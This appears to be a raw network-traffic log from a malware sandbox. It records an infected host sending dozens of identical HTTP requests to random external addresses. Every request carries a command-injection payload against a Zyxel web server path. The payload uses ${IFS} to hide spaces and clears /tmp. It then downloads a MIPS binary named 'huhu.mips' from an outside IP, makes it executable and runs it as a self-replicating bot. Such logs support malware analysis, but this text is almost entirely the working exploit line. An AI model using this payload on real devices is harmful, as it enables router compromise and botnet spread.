                                                  Jan 19, 2024 18:24:02.195451975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6079192.168.2.1333512173.198.245.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195477962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6080192.168.2.133485238.178.107.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195527077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6081192.168.2.135272425.81.122.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195573092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6082192.168.2.133864093.212.45.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195616007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6083192.168.2.1353010114.8.200.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195653915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6084192.168.2.1348686131.26.192.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195677996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6085192.168.2.1359146120.37.141.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195714951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6086192.168.2.1335676159.42.60.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195763111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6087192.168.2.134853059.205.168.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195823908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6088192.168.2.134104027.94.53.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195842028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6089192.168.2.1355958112.182.220.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195889950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6090192.168.2.13591081.200.24.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195924044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6091192.168.2.133764299.1.70.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195967913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6092192.168.2.136023881.12.9.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196000099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6093192.168.2.133685893.37.235.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196037054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6094192.168.2.1342932147.233.241.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196084976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6095192.168.2.134919272.51.35.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196131945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6096192.168.2.1337356170.207.13.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196186066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6097192.168.2.134159663.185.133.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196212053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6098192.168.2.1337096140.81.215.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196259022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6099192.168.2.135753471.144.92.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196290970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6100192.168.2.1360636190.179.173.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196327925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6101192.168.2.133552870.121.116.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196360111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6102192.168.2.135411279.103.189.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196410894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6103192.168.2.1352340122.211.190.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196448088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6104192.168.2.1348676180.70.58.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196480989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6105192.168.2.1351098158.223.177.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196518898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6106192.168.2.13563561.42.241.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196556091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6107192.168.2.133984443.143.156.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.196609974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6108192.168.2.135897489.90.27.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.199963093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6109192.168.2.1350114135.77.133.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.200318098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6110192.168.2.1354070165.136.91.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.200366020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6111192.168.2.1348516144.45.11.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.200417995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6112192.168.2.134825895.237.152.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.200454950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6113192.168.2.1334014200.83.220.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.190577984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6114192.168.2.1353884107.197.154.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.190747976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6115192.168.2.1349754201.85.164.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.190787077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6116192.168.2.1345366212.170.114.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.190834045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6117192.168.2.133286280.2.162.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.190871954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6118192.168.2.135305496.210.50.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.190926075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6119192.168.2.135220075.62.140.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.190987110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6120192.168.2.1339208151.45.217.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191030025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6121192.168.2.1334054221.95.155.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191056013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6122192.168.2.1339324173.112.62.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191109896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6123192.168.2.135759849.154.152.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191128969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6124192.168.2.1360128122.207.187.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191162109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6125192.168.2.134112292.64.209.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191195965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6126192.168.2.133641699.195.91.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191255093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6127192.168.2.135688093.25.204.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191282034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6128192.168.2.1357572120.133.74.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191333055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6129192.168.2.135459245.247.34.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191370964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6130192.168.2.1356546132.15.107.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191412926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6131192.168.2.1358950175.179.196.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191451073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6132192.168.2.135415640.209.50.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191492081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6133192.168.2.1333544192.144.62.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191521883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6134192.168.2.1351818156.46.7.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191565990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6135192.168.2.133427047.194.139.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191613913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6136192.168.2.134791053.37.83.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191657066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6137192.168.2.134266490.15.27.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191688061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6138192.168.2.1349970177.32.169.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191719055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6139192.168.2.133315232.193.84.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191765070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6140192.168.2.1337040202.11.84.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191797972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6141192.168.2.1351814166.18.81.23443
                                                  TimestampBytes transferredDirectionData
